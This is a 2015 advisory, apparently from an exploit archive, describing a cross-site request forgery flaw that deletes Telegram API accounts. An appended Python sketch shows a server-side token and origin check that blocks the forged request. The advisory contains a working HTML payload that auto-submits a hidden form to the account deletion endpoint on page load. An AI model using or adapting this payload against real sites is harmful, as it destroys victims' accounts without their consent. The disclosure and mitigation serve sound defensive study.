Telegram API suffers from a cross site request forgery vulnerability. Note that this advisory has site-specific information.
/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
**
** Exploit Author: C4T
**
** Vendor Homepage : http://my.telegram.org
**
** Google Dork: none
**
** Date: 06/27/2015
**
** Tested on: Windows 7
**
************************************************************************************
** Exploit Code:
******************
<body onload="document.exploit.submit()">
<form name="exploit"
action="https://my.telegram.org/deactivate/do_delete"
id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>
*************************************************************************************
** Description:
******************
When a user is logged in to the Telegram API, simply opening a web page
containing this exploit will delete his account.
Discovered by C4T
@ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
**
** More Details and Explanation:
**
** http://hatrhyme.com/CSRFInTelegram.pdf
**
******************************************************************************************
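
The form above carries only a "message" field and nothing tied to the victim's session, which is what lets another site submit it. The following is an added example, not part of the original advisory and not Telegram's code, of a server-side check that rejects such a request; the secret, session id, token field name and function names are assumptions made for the sketch.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumed values for this sketch: a server-side secret and a constructed session id.
SERVER_SECRET = b"constructed-demo-secret"
SESSION_ID = "constructed-session-1234"
TRUSTED_ORIGIN = "https://my.telegram.org"  # origin of the form action in the advisory

def issue_csrf_token(session_id):
    """Token bound to the session; the genuine form embeds it as a hidden field."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers):
    """Accept only requests whose Origin (or Referer) is the site itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN

def allow_state_change(method, headers, form, session_id):
    """Return (allowed, reason) for a request to a state-changing endpoint."""
    if method != "POST":
        return False, "state change must use POST"
    if not same_origin(headers):
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_csrf_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"

# Constructed requests. The first mirrors the advisory's form: no method attribute
# (so the browser submits GET), a single "message" field, sent from another site.
FORGED = ("GET", {"Referer": "https://other-site.example/page.html"},
          {"message": "ExploitedByC4T"})
FORGED_AS_POST = ("POST", {"Origin": "https://other-site.example"},
                  {"message": "ExploitedByC4T"})
GENUINE = ("POST", {"Origin": TRUSTED_ORIGIN},
           {"message": "user request", "csrf_token": issue_csrf_token(SESSION_ID)})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("forged-post", FORGED_AS_POST),
                      ("genuine", GENUINE)):
        print(name, allow_state_change(*req, SESSION_ID))
```

Setting the session cookie with SameSite=Lax or Strict adds a browser-side layer on top of this check, since the cookie is then withheld from cross-site form posts.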